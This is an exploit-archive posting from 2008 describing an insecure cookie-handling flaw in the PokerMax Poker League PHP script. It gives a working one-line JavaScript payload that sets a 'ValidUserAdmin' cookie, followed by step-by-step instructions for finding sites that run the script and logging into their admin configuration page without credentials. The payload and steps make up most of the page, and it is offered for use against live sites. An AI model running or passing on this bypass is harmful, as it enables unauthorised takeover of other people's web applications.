[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : PokerMax Poker League Insecure Cookie Handling Vulnerability
# Published : 2008-10-16
# Author : DaRkLiFe
# Previous Title : IP Reg <= 0.4 Multiple Remote SQL Injection Vulnerabilities
# Next Title : Kure 0.6.3 (index.php post,doc) Local File Inclusion Vulnerability


**************************************************************************************

Author : DaRkLiFe
Greetz : str0ke & S.W.A.T. & funkys0ul

**************************************************************************************
Script   :

PokerMax Poker League Insecure Cookie Handling Vulnerability

Download:

http://www.stevedawson.com/downloads/pokerleague.zip
**************************************************************************************

Exploit :

javascript:document.cookie = "ValidUserAdmin=admin";

**here "admin" refers to username of administrator on site

default username is "admin" given after installation of site

but if it is changed u can easily find out username of admin and then 
substitute it in place of "admin"
**************************************************************************************

Instructions :

Find the site running on this script .

Go to http://site.com/pokerleague/pokeradmin/configure.php

It will ask for login. Now in url tab run the exploit command

Then return back to http://site.com/pokerleague/pokeradmin/configure.php

Now u should be loggedin as admin and change the thing into what you want .

**************************************************************************************

THANKS ! GREETZ ! HAPPY DIWALI !
**************************************************************************************

# www.Syue.com [2008-10-16]